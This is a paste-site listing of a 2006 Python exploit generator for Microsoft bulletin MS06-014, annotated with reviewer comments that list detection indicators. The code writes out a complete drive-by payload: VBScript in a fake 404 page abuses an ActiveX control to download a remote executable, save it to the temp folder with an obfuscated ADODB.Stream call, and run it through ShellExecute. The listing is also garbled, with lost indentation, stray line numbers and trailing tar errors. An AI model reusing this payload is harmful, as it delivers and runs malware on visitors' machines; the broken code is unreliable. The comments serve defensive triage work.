FlyFar

Exploit.Python.Psyme.a - Source Code

Jun 12th, 2023
Bash 3.13 KB | Cybersecurity | 0 0
#!/bin/sh -
"exec" "python" "-O" "$0" "$@"
# The two lines above make the file an sh/Python polyglot: /bin/sh runs line 2
# as `exec python -O <this file> <args>`, while Python parses the same line as
# adjacent string literals, i.e. an expression statement with no effect.
# The `print` statements further down are Python 2 syntax, so the `python` on
# PATH has to be a Python 2 interpreter for the file to parse at all.

# Module banner, reused as the usage text. It names Microsoft bulletin
# MS06-014 and gives the date April 2006.
# NOTE(review): "CVS-2006-0003" in the banner reads as a typo for
# CVE-2006-0003, and "RDS.DataStore" presumably means the RDS.DataSpace
# ActiveX control -- confirm both against the MS06-014 bulletin. The string is
# kept exactly as published.
# NOTE(review): the paste site labels this listing "Bash"; apart from the
# two-line launcher it is Python.
__doc__ = """[BL4CK] - MS06-014

RDS.DataStore - Data Execution
CVS-2006-0003
MS06-014

April 2006

*** This is a bit outdated, but it works very well ***

Usage: ./bl4ck_ms06_014.py http://omfg.what.ho.st/~user/stage2.exe index.html

Now upload index.html to the same web server hosting your
http://omfg.what.ho.st/~user/stage2.exe

                           - redsand@blacksecurity.org
"""

# Interpolated into MS06014.__version below; not used anywhere else in the
# visible listing.
__version__ = "1.0"
  23.  
  24. import sys, random
  25.  
class MS06014:
    # Pure string templating: takes one URL and returns an HTML document whose
    # VBScript block has that URL substituted in. Nothing in this class opens
    # a socket or touches the filesystem; the script only runs in a browser
    # that renders the generated page.
    #
    # NOTE(review): the listing lost its indentation when it was pasted -- the
    # bodies of __init__ and bl4ck below sit at the same column as their `def`
    # lines, so the class does not parse as published. The lines are kept as
    # they appear on the page.
    #
    # What the templates show, useful for detection and triage:
    #   * the page creates an <object> element with classid
    #     BD96C556-65A3-11D0-983A-00C04FC29E36 and calls CreateObject on it
    #     for Microsoft.XMLHTTP, ADODB.Stream, Scripting.FileSystemObject and
    #     Shell.Application; script-driven CreateObject calls on that classid
    #     in served HTML are the signature to key on;
    #   * "Adodb.Stream" is assembled from four fragments at run time,
    #     presumably so that a plain string match on the ProgID fails --
    #     match on the classid / CreateObject pattern instead;
    #   * the response body is saved as "bl4ck.com" under the folder returned
    #     by GetSpecialFolder(2) (the template's own comment calls it the tmp
    #     folder) and then handed to ShellExecute, so a file of that name in
    #     a user's temp directory is a host-side indicator;
    #   * the visible part of the page imitates a "404 Not Found" error.
    # Remediation is the MS06-014 update named in the module banner; see the
    # bulletin for the vendor's workarounds.

    # A VBScript comment line (leading apostrophe) carrying the tool version.
    # Not referenced by any code in the visible listing.
    __version = "'[BL4CK] MS06-014 " + __version__ + "\r\n"


    # HTML wrapper. The literal token BL4CK_PAYLOAD is the substitution point
    # used by bl4ck(). `on error resume next` makes the VBScript continue past
    # any failing statement.
    # NOTE(review): the markup is malformed as published (two <head>/<body>
    # pairs, no opening <html>); left untouched because it is runtime text.
    __html = """
   <title></title>
   <head></head>

   <body>

   <script language="VBScript">

   on error resume next

   BL4CK_PAYLOAD

   </script>
   <head>
   <title>[BL4CK] || 404 Not Found</title>
   </head><body>
   <h1>Not Found</h1>
   pwn3d!!
   <hr>
   <!-- <script>location.href='http://google.com'</script> -->
   </body>

   </html>

   """

    # VBScript body. The literal token URLFILE is replaced with the URL given
    # to the constructor. The apostrophe-prefixed lines inside the string are
    # the author's VBScript comments and are part of the emitted page.
    __payload = """

   ' due to how ajax works, the file MUST be within the same local domain
   dl = "URLFILE"

   ' create adodbstream object
   Set df = document.createElement("object")
   df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
   str="Microsoft.XMLHTTP"
   Set x = df.CreateObject(str,"")

   a1="Ado"
   a2="db."
   a3="Str"
   a4="eam"
   str1=a1&a2&a3&a4
   str5=str1
   set S = df.createobject(str5,"")
   S.type = 1

   ' xml ajax req
   str6="GET"
   x.Open str6, dl, False
   x.Send

   ' Get temp directory and create our destination name
   fname1="bl4ck.com"
   set F = df.createobject("Scripting.FileSystemObject","")
   set tmp = F.GetSpecialFolder(2) ' Get tmp folder
   fname1= F.BuildPath(tmp,fname1)
   S.open
   ' open adodb stream and write contents of request to file
   ' like vbs dl+exec code
   S.write x.responseBody
   ' Saves it with CreateOverwrite flag
   S.savetofile fname1,2

   S.close
   set Q = df.createobject("Shell.Application","")
   Q.ShellExecute fname1,"","","open",0

   """

    # Stores the URL string that bl4ck() will substitute for URLFILE. The
    # value is kept as given; no validation is performed here.
    def __init__(self, file):

    self.__file = file



    # Returns the finished HTML as a string: URLFILE in the payload is
    # replaced with the stored URL, then BL4CK_PAYLOAD in the wrapper is
    # replaced with the result. The first assignment creates an instance
    # attribute that shadows the class-level template. Despite the name
    # `encoded`, no encoding or escaping step is applied -- the URL is
    # inserted verbatim.
    def bl4ck(self):
    self.__payload = self.__payload.replace("URLFILE",self.__file)

    encoded = self.__payload

    ret = self.__html.replace("BL4CK_PAYLOAD",encoded)

    return ret
  114.  
  115.  
# Command-line entry point: expects <download url> <outfile>, builds the page
# with MS06014(url).bl4ck() and writes it to <outfile>.
# Python 2 only -- `print` is used as a statement throughout.
# NOTE(review): indentation is reproduced as published; the `ms = ...` and
# `ret = ...` lines sit at a column that matches no enclosing block, an
# artefact of the paste rather than intended structure.
if __name__ == '__main__':

    url=False
    out=False

    print "[BL4CK] MS06-014 - redsand@blacksecurity.org"
    print "URL path to the file must be on the same domain as the HTM file"
    print "http://blacksecurity.org\r\n"


    argc = len(sys.argv)
    # Fewer than two arguments: print usage and exit with status 0.
    if(argc <= 2):
            print "USAGE: %s <download url> <outfile>" % sys.argv[0]
            sys.exit(0)
    # Past the guard above argc is at least 3, so both tests below always hold.
    if(argc > 1):
            url = sys.argv[1]
    if(argc > 2):
            out = sys.argv[2]

        ms = MS06014(url)

        ret = ms.bl4ck()


    # Third argument 0 to open() requests unbuffered I/O in Python 2.
    try:
        fsock = open(out, "w+", 0)
        try:
            fsock.write(ret );
        finally:
            fsock.close()
    # NOTE(review): an IOError is silently discarded here, so the "Wrote ..."
    # line below is printed even when nothing reached the output file.
    except IOError:
        pass

    print "Wrote %r bytes to: %s" % (len(ret),out)
  150.  
  151. # milw0rm.com [2006-07-21]
  152. /bin/tar: Skipping to the next header
  153. /bin/tar: Error exit delayed from previous errors
Tags: Exploit BASH